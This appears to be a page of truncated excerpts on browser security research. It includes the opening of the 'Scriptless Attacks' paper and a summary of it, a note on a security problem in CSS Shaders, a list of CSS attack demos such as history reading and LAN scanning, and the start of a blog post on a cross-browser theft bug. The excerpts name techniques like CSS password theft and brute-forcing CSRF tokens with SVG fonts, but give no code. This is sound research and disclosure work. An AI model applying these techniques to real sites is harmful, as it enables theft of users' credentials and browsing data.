Scriptless Attacks – Stealing the Pie Without Touching the Sill Mario Heiderich, Marcus Niemietz, Felix Schuster, Thorsten Holz, Jörg Schwenk Horst Görtz Institute for IT-Security Ruhr-University Bochum, Germany {firstname.lastname}@rub.de ABSTRACT Due to their high practical impact, Cross-Site Scripting (XSS) attacks have attracted a lot of attention from the security community members. In the sa
Scriptless Attacks - Stealing the Pie without touching the Sill - The document discusses scriptless attacks that can bypass traditional XSS defenses like NoScript and XSS filters by leveraging new HTML5 and CSS features. - It presents several proof-of-concept attacks including using CSS to steal passwords, using SVG fonts to brute force CSRF tokens, and using custom fonts to leak sensitive informa
CSS Shaders is a new feature folks from Adobe, Apple, and Opera have proposed to the W3C CSS-SVG Effects Task Force. Rather than being limited to pre-canned effects, such as gradients and drop shadows, CSS Shaders would let web developers apply arbitrary OpenGL shaders to their content. That makes for some really impressive demos. Unfortunately, CSS Shaders has a security problem. To understand
The Sexy Assassin's Arsenal - Power optimized Concussion sticks (PoCs) Arithmetics Sums Multiplications chmod calc CSS Hangman Game CSK1 CSK2 Loops Stopmotion animation 7 segments counter binary counter Mouse tracking CSS Paint CSS Attribute Reading Attribute Reader History Reading CSS History Bool CSS LAN Scanner History Crawler
Well, here's a nice little gem for the festive season. I like it for a few distinct reasons: It's one of those cases where if you look at web standards from the correct angle, you can see a security vulnerability specified. Accordingly, it affected all 5 major browsers. And likely the rest. You can still be a theft victim even with plugins and JavaScript disabled! It's much less serious than it cou